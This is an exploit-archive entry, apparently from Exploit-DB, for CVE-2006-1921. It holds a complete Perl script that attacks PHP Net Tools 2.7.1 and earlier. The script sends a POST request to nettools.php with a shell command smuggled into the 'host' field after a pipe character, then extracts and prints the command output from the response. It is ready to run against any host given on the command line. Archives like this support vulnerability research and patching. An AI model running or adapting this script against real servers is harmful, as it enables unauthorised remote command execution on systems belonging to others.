PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit

2006-04-18T00:00:00
ID EDB-ID:1695
Type exploitdb
Reporter FOX_MULDER
Modified 2006-04-18T00:00:00

Description

PHP Net Tools <= 2.7.1 Remote Code Execution Exploit. CVE-2006-1921. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl
# PHP Net Tools Remote Code Execution Exploit
#
# by FOX_MULDER (fox_mulder@abv.bg)
# Vulnerability found by FOX_MULDER.
#
# "Born to be root !!!"
#----------------------------------+
#PHP Net Tools                     |
#Copyright (C) 2005 Eric Robertson |
#h4rdc0d3@gmail.com                |
#----------------------------------+
#
# Fact:Wbyte counted twice to infinity !!!
#
#
###################################################
	use LWP 5.64;

	my $hostname = $ARGV[0];
	my $dir = $ARGV[1];
	my $command = $ARGV[2];

        if (@ARGV&lt;2) {
	print "\nUsage: ntools.pl www.site.com /dir/ \"ls \-la\" \n";
	exit();
	}
	
	print "=======================================================\n";
	print "0day 0day 0day 0day 0day 0day 0day 0day 0day 0day 0day\n";
	print "PHP Net Tools Command Execution Exploit by FOX_MULDER\n";
	print "fox_mulder@abv.bg\r\n";
	print "=======================================================\n";

	my $browser = LWP::UserAgent-&gt;new;
	$browser-&gt;agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
	print "\n\n[+]Sending request to server . . .\r\n";
	
	my $url = "http://$hostname$dir/nettools.php";

	
	my $response = $browser-&gt;post( $url,[
		'ping' =&gt; '1',
        	'host' =&gt; "|$command"]);

 	my $code = $response-&gt;status_line;
        print "[+] HTTP RESPONSE $code\n";
        print "\n[+]Injecting command . . .\n";
	$response-&gt;content =~ /blockquote&gt;(.*)&lt;\/blockquote&gt;/s;
	print "$1\n";

# milw0rm.com [2006-04-18]